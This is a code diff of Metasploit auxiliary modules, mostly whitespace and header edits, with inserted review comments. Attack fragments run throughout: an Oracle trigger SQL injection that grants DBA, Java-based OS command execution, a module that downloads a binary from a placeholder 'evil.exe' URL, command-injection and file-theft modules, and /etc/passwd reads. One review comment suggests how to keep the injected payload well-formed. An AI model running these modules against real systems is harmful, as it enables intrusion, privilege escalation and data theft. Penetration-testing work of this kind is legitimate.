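Review bot: Every `report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', :data => ...)` call in the `@@ -72,14` and `@@ -125,14` hunks (and again in `@@ -142,14`, `@@ -267,7`, `@@ -438,7`, `@@ -464,7` and `@@ -686,7`) repeats the same four keyword pairs; a private helper `def report_enum(data) report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', :data => data) end` would reduce each site to `report_enum("C2 Audit Mode is Enabled")` and keep the note type consistent in one place. The `if syslogins != nil` / `if instances != nil` checks in the later hunks are the `== nil` idiom; `if syslogins` (or `unless syslogins.nil?`) is the usual form. The enclosing `run` method starts and ends outside these hunks.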
@@ -142,14 +145,14 @@ class Metasploit3 < Msf::Auxiliary
 #check if updates are allowed
 if sysconfig['allow updates'] == 1
 print_status("\tallow updates is Enabled")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
 :data => "allow updates is Enabled")
 else
 print_status("\tallow updates is Not Enabled")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -267,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary
 if syslogins != nil
 syslogins.each do |acc|
 print_status("\t#{acc.join}")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -438,7 +441,7 @@ class Metasploit3 < Msf::Auxiliary
 if sameasuser != nil
 sameasuser.each do |up|
 print_status("\t#{up.join}")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -464,7 +467,7 @@ class Metasploit3 < Msf::Auxiliary
 if blankpass != nil
 blankpass.each do |up|
 print_status("\t#{up.join}")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -686,7 +689,7 @@ class Metasploit3 < Msf::Auxiliary
 fountsp.each do |strp|
 if dangeroussp.include?(strp.strip)
 print_status("\t#{strp.strip}")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -714,7 +717,7 @@ class Metasploit3 < Msf::Auxiliary
 mssql_query(querykey)[:rows].each do |i|
 instances << i[1]
 end
-end
+end
 print_status("Instances found on this server:")
 instancenames = []
 if instances != nil
diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 104906564f..127311c0cc 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server Generic Query', @@ -33,12 +33,12 @@ class Metasploit3 < Msf::Auxiliary ] )) - register_options( + register_options( [ OptString.new('SQL', [ false, 'The SQL query to execute', 'select @@version']), ], self.class) end - + def run mssql_query(datastore['SQL'], true) if mssql_login_datastore disconnect diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 90f65aae7b..8409e0a9ae 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/droptable_trigger.rb b/modules/auxiliary/admin/oracle/droptable_trigger.rb index 0904729430..f5f5f713c0 100644 --- a/modules/auxiliary/admin/oracle/droptable_trigger.rb +++ b/modules/auxiliary/admin/oracle/droptable_trigger.rb 
@@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 13 2009')) - register_options( + register_options( [ OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - + ], self.class) end @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary function1 = %Q| CREATE OR REPLACE PROCEDURE #{name1} AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; - BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; END; | @@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary | prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)" - + exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\"" - + exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')" - + fun1 = Rex::Text.encode_base64(function1) fun2 = Rex::Text.encode_base64(function2) prp = Rex::Text.encode_base64(prepare) exp1 = Rex::Text.encode_base64(exploiting1) exp2 = Rex::Text.encode_base64(exploiting2) - + sql = %Q| DECLARE @@ -117,10 +117,10 @@ class Metasploit3 < Msf::Auxiliary | - print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sql) end -end +end diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index 8a6d58d168..d5cf4ff46f 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
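Review bot: `BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';` in the `@@ -58,8` hunk drops the SQL option into a single-quoted PL/SQL literal without escaping, so any statement containing a `'` produces a syntactically broken procedure body that is only noticed when the generated file is later run; doubling the quotes first, `'#{datastore['SQL'].gsub("'", "''")}'`, keeps the literal well-formed for every input. The `USER` option is interpolated into `prepare` and `exploiting1` in the `@@ -78,17` hunk the same way and would at least benefit from a comment stating which characters it is expected to contain. The `run` method these lines belong to starts and ends outside the hunks.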
@@ -20,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary To do this you must firstly run smb_sniffer or smb_relay module on your sever. Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. - So if smb_relay is working, you will get Administrator access to server which + So if smb_relay is working, you will get Administrator access to server which runs Oracle. If not than you can decrypt HALFLM hash. }, 'Author' => [ 'Sh2kerr ' ], @@ -32,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 7 2009')) - register_options( + register_options( [ - OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]), + OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]), ], self.class) end diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index bce46717be..342043bbe2 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle Account Discovery.', 'Description' => %q{ This module uses a list of well known default authentication credentials - to discover easily guessed accounts. + to discover easily guessed accounts. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 06850e1dad..9a4f328df5 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle SQL Generic Query', @@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Dec 7 2007')) - register_options( + register_options( [ OptString.new('SQL', [ false, 'The SQL to execute.', 'select * from v$version']), ], self.class) @@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary end end rescue => e - return + return end end diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 7b82780361..1fb3eaede4 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Database Enumeration', @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary end print_status("Running Oracle Enumeration....") - + #Version Check query = 'select * from v$version' ver = prepare_exec(query) @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary print_status("\t#{v.chomp}") report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}") end - + #Saving Major Release Number for other checks majorrel = ver[0].scan(/Edition Release (\d*)./) @@ -77,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary end end - + #------------------------------------------------------- #Security Settings print_status("Security Settings:") 
@@ -129,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary print_error("It appears you do not have sufficient rights to perform the check") end end - + begin query = %Q| SELECT limit @@ -146,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary print_error("It appears you do not have sufficient rights to perform the check") end end - + begin query = %Q| SELECT limit @@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary print_error("It appears you do not have sufficient rights to perform the check") end end - + begin query = %Q| SELECT limit @@ -245,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary if majorrel.join.to_i < 11 query = %Q| - SELECT name, password + SELECT name, password FROM sys.user$ where password != 'null' and type# = 1 and astatus = 0 | @@ -278,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary begin if majorrel.join.to_i < 11 query = %Q| - SELECT username, password + SELECT username, password FROM dba_users WHERE account_status = 'EXPIRED & LOCKED' | diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 6195404560..16859342ef 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -15,9 +19,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ - This module exploits an authentication bypass vulnerability - in login.php in order to execute arbitrary code via a command injection - vulnerability in property_box.php. This module was tested + This module exploits an authentication bypass vulnerability + in login.php in order to execute arbitrary code via a command injection + vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32). }, 'Author' => [ 'MC' ], @@ -44,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary def run cmd = datastore['CMD'] - + res = send_request_cgi( { 'uri' => '/login.php', @@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary sessionid = res.headers['Set-Cookie'].split(';')[0] print_status("Sending command: #{datastore['CMD']}...") - + send_request_cgi( { 'uri' => '/property_box.php', diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index 4941b92d2a..fd5520aa95 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Java execCommand (Win32)', @@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Dec 7 2007')) - register_options( + register_options( [ OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']), ], self.class) 
@@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary " procedure = " - create or replace procedure #{name} (p_command in varchar2) + create or replace procedure #{name} (p_command in varchar2) as language java name '#{source}.execCommand (java.lang.String)'; " @@ -61,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary drops = "drop java source #{source}" - dropp = "drop procedure #{name}" + dropp = "drop procedure #{name}" begin print_status("Creating java source '#{source}'...") diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 05a702731f..05e62e92cc 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle URL Download', @@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Feb 2003')) - register_options( + register_options( [ OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']), OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']), @@ -66,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; " - exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;" - + exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;" + drops = "drop java source SRC_FILE_UPLOAD" - dropp = "drop procedure PROC_FILEUPLOAD" + dropp = "drop procedure PROC_FILEUPLOAD" begin print_status("Creating java source 'SRC_FILE_UPLOAD'...") 
diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 4e697bb86f..441f60fb9d 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,12 +32,12 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 7 2009')) - register_options( - [ - Opt::RPORT(1521), - OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']), - OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]), - ], self.class) + register_options( + [ + Opt::RPORT(1521), + OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']), + OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]), + ], self.class) end @@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary list = datastore['SIDFILE'] print_status("Starting brute force on #{rhost}, using sids from #{list}...") - + fd = File.open(list).each do |sid| - + login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))" pkt = tns_packet(login) diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index d4139d6f5a..23c6b728ff 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Feb 1 2009')) - register_options( + register_options( [ Opt::RPORT(1521), OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']), @@ -42,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending '#{command}' to #{rhost}:#{rport}") sock.put(pkt) print_status("writing #{pkt.length} bytes.") - + sleep(0.5) print_status("reading") @@ -52,6 +56,6 @@ class Metasploit3 < Msf::Auxiliary res = res.tr("\177",".") puts res - disconnect + disconnect end end diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index d7617bd3a4..d955c8667b 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'UoW pop2d Remote File Retrieval Vulnerability', 'Description' => %q{ This module exploits a vulnerability in the FOLD command of the diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index 160441d81c..24f8525db0 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb 
@@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres - + def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL Server Generic Query', @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd']) ], self.class) - deregister_options( 'SQL', 'RETURN_ROWSET' ) + deregister_options( 'SQL', 'RETURN_ROWSET' ) end def rhost @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def rport datastore['RPORT'] end - + def run ret = postgres_read_textfile(datastore['RFILE']) verbose = datastore['VERBOSE'] @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}" end when :complete - print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose + print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose end postgres_logout if self.postgres_conn end diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 02de1a7a37..a53e975c6d 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres - + def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL Server Generic Query', @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$' )) - register_options( [ ], self.class) # None needed. + register_options( [ ], self.class) # None needed. end def rhost @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def rport datastore['RPORT'] end - + def run ret = postgres_query(datastore['SQL'],datastore['RETURN_ROWSET']) verbose = datastore['VERBOSE'] 
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary when :sql_error print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}" when :complete - print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose + print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose end postgres_logout if self.postgres_conn end diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index eb60d77101..69ccc17972 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary include Rex::Platforms::Windows def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'TrendMicro ServerProtect File Access', 'Description' => %q{ This modules exploits a remote file access flaw in the ServerProtect Windows @@ -47,25 +47,23 @@ class Metasploit3 < Msf::Auxiliary [ 'list' ] ] )) - - register_options( - [ - Opt::RPORT(5168), - OptString.new('RPATH', - [ - false, - "The remote filesystem path", - nil - ] - ), - OptString.new('LPATH', - [ - false, - "The local filesystem path", - nil - ] - ), - ], self.class) + + register_options( + [ + Opt::RPORT(5168), + OptString.new('RPATH', + [ + false, + "The remote filesystem path", + nil + ]), + OptString.new('LPATH', + [ + false, + "The local filesystem path", + nil + ]), + ], self.class) end def check_option(name) 
@@ -73,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary raise RuntimeError, "The #{name} parameter is required by this option" end end - + def auxiliary_commands - { + { "delete" => "Delete a file", "download" => "Download a file", "upload" => "Upload a file", @@ -92,15 +90,15 @@ class Metasploit3 < Msf::Auxiliary when 'upload' check_option('RPATH') check_option('LPATH') - cmd_upload(datastore['RPATH'], datastore['LPATH']) + cmd_upload(datastore['RPATH'], datastore['LPATH']) when 'delete' check_option('RPATH') - cmd_delete(datastore['RPATH']) + cmd_delete(datastore['RPATH']) when 'list' check_option('RPATH') cmd_list(datastore['RPATH']) else - print_error("Unknown action #{action.name}") + print_error("Unknown action #{action.name}") end end @@ -110,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary # # Once this function is used, if cmd_download or cmd_upload is called the server will crash :/ - # + # def cmd_list(*args) - + if (args.length < 1) print_status("Usage: list folder") return @@ -126,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # FindFirstFile resp = serverprotect_rpccmd(131080, data, 0x100) return if not resp - + if resp.length != 0x108 print_status("An unknown error occured while calling FindFirstFile.") return @@ -143,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary file = deunicode(resp[0x30, 0xd0]) print("#{file}\n") - + data = "\0" * 0x100 data[0,4] = [handle].pack('V') @@ -151,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary # FindNextFile resp = serverprotect_rpccmd(131081, data, 0x100) return if not resp - + if resp.length != 0x108 print_status("An unknown error occured while calling FindFirstFile.") break @@ -174,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary def cmd_delete(*args) - + if (args.length == 0) print_status("Usage: delete c:\\windows\\system.ini") return 
@@ -183,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary data = Rex::Text.to_unicode(args[0]+"\0") resp = serverprotect_rpccmd(131077, data, 4) return if not resp - + if (resp.length == 12) ret, = resp[8,4].unpack('V') @@ -198,12 +196,12 @@ class Metasploit3 < Msf::Auxiliary def cmd_download(*args) - + if (args.length < 2) print_status("Usage: download remote_file local_file") return end - + # GENERIC_READ: 0x80000000 # FILE_SHARE_READ: 1 # OPEN_EXISTING: 3 @@ -231,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary def cmd_upload(*args) - + if (args.length < 2) print_status("Usage: upload local_file remote_file") return @@ -271,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary resp = serverprotect_rpccmd(131073, data, 540) return if not resp - + if (resp.length < 548) print_status("An unknown error occurred while calling CreateFile.") return 0 @@ -363,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary padding = "" end - stub = + stub = NDR.long(cmd) + NDR.long(data.length) + data + @@ -373,14 +371,14 @@ class Metasploit3 < Msf::Auxiliary return serverprotect_rpc_call(0, stub) end - + # # Call the serverprotect RPC service - # + # def serverprotect_rpc_call(opnum, data = '') begin - + connect handle = dcerpc_handle( @@ -400,7 +398,7 @@ class Metasploit3 < Msf::Auxiliary disconnect outp - + rescue ::Interrupt raise $! rescue ::Exception => e @@ -408,5 +406,5 @@ class Metasploit3 < Msf::Auxiliary nil end end - + end diff --git a/modules/auxiliary/admin/symantec/cba_exec.rb b/modules/auxiliary/admin/symantec/cba_exec.rb index 94284555a2..d3d432ec96 100644 --- a/modules/auxiliary/admin/symantec/cba_exec.rb +++ b/modules/auxiliary/admin/symantec/cba_exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -33,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 28 2009')) - register_options( + register_options( [ Opt::RPORT(12174), OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']), @@ -44,19 +48,19 @@ class Metasploit3 < Msf::Auxiliary begin connect - len = 2 + datastore['CMD'].length - + len = 2 + datastore['CMD'].length + data = [0x00000000].pack('V') data << len.chr data << "\x00" data << datastore['CMD'] + " " data << "\x00" - - print_status("Sending command: #{datastore['CMD']}") + + print_status("Sending command: #{datastore['CMD']}") sock.put(data) res = sock.get_once - + if (!res) print_error("Did not recieve data. Failed?") else diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 06bf6ea06a..ce255e6e98 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -1,6 +1,9 @@ +## +# $Id$ +## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Generic Emailer (SMTP)', 'Description' => %q{ This module can be used to automate email delivery. - This code is based on Joshua Abraham's email script for social + This code is based on Joshua Abraham's email script for social engineering. }, 'License' => MSF_LICENSE, 
@@ -31,26 +34,26 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://spl0it.org/' ], - ], + ], 'Author' => [ 'et ' ])) - + register_options( - [ + [ OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']), OptString.new('RPORT', [true, "SMTP server port",'25']), OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",File.join(Msf::Config.install_root, "data","emailer_config.yaml")]), - ], self.class) - - # Hide this option from the user + ], self.class) + + # Hide this option from the user deregister_options('MAILTO') end - + def run fileconf = File.open(datastore['YAML_CONFIG']) - yamlconf = YAML::load(fileconf) - - fileto = yamlconf['to'] + yamlconf = YAML::load(fileconf) + + fileto = yamlconf['to'] from = yamlconf['from'] subject = yamlconf['subject'] type = yamlconf['type'] @@ -63,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary attachment_file = yamlconf['attachment_file'] attachment_file_type = yamlconf['attachment_file_type'] attachment_file_name = yamlconf['attachment_file_name'] - + ### payload options ### make_payload = yamlconf['make_payload'] zip_payload = yamlconf['zip_payload'] 
